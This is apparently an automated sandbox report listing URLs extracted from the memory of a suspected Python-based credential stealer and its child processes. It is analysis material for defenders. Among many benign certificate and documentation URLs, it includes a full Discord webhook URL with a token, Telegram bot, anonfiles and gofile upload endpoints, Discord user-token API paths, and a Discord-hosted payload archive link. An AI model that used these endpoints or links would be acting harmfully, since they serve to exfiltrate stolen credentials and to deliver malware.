Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A8571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.000002506853A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr~
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
Source: powershell.exe, 00000006.00000002.1957704599.0000021ED7999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1947586190.0000026CB98F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2087591668.0000026CC8143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2087591668.0000026CC8010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000002.2265625565.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000002E.00000002.1947586190.0000026CB9898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000006.00000002.1890826946.0000021EC7B49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000006.00000002.1890826946.0000021EC7921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1947586190.0000026CB7F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1890826946.0000021EC7B49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: El9HaBFrFM.exe, 00000001.00000002.2251098631.0000025068940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://trksyln.net/tgmacro/data/VersionInfo.jsondhttp://trksyln.net/tgmacro/data/ShadyWebSites.json
Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 0000002E.00000002.1947586190.0000026CB95D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000002E.00000002.1947586190.0000026CB9898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000002.2265625565.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: El9HaBFrFM.exe, 00000001.00000003.1894005943.0000025068450000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249686549.0000025068450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: powershell.exe, 00000006.00000002.1984874757.0000021EDFF70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coEu
Source: El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp, bound.exe, 00000012.00000002.1793626562.0000026C529D7000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000002.1794399266.0000026C529FC000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000002.1797031236.0000026C54381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.trksyln.net/tgmacro/download
Source: bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trksyln.net/tgmacro/download1
Source: bound.exe, 00000012.00000002.1794399266.0000026C529FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trksyln.net/tgmacro/download9
Source: bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trksyln.net/tgmacro/downloadE
Source: bound.exe, 00000012.00000002.1793626562.0000026C5297C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trksyln.net/tgmacro/downloadG
Source: bound.exe, 00000012.00000002.1793626562.0000026C529D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trksyln.net/tgmacro/downloadQ
Source: bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trksyln.net/tgmacro/downloadl
Source: bound.exe, 00000012.00000002.1793626562.0000026C529D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trksyln.net/tgmacro/downloadses
Source: bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trksyln.net/tgmacro/downloadu
Source: El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.trksyln.netYhttps://trksyln.net/tgmacro/HowToUse/Actionsahttps://trksyln.net/tgmacro/HowT
Source: El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E08000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254155732.0000025069870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: El9HaBFrFM.exe, 00000001.00000002.2254155732.00000250698B4000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E04000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 00000006.00000002.1890826946.0000021EC7921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1947586190.0000026CB7F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadr#
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr~
Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr~r
Source: El9HaBFrFM.exe, 00000001.00000003.1882939559.0000025068C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.stripe.com/v
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068B10000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AC4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: El9HaBFrFM.exe, 00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/1277354137243353152/1301611639166078986/Blank-user.rar?ex=67
Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000002E.00000002.2087591668.0000026CC8010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002E.00000002.2087591668.0000026CC8010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002E.00000002.2087591668.0000026CC8010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: El9HaBFrFM.exe, 00000001.00000002.2251005374.0000025068840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1301205706979938325/6QPgIPYq-Css-OJ6_lkSJ5Pdu0MNeXcvPrjnAZiyfOIJh3P
Source: El9HaBFrFM.exe, 00000001.00000003.1882939559.0000025068C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v
Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: El9HaBFrFM.exe, 00000001.00000003.1707245032.0000025067E9F000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: El9HaBFrFM.exe, 00000001.00000003.1693682423.0000025067CCD000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249485409.0000025068040000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1693415514.0000025067CB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: El9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: El9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: El9HaBFrFM.exe, 00000001.00000002.2246526490.0000025067A24000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: El9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: El9HaBFrFM.exe, 00000001.00000002.2246526490.0000025067A24000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: El9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: El9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: El9HaBFrFM.exe, 00000001.00000002.2246526490.00000250679A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: El9HaBFrFM.exe, 00000001.00000002.2245395851.00000250660C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: El9HaBFrFM.exe, 00000001.00000002.2250811628.0000025068640000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.000002506853A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A85A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
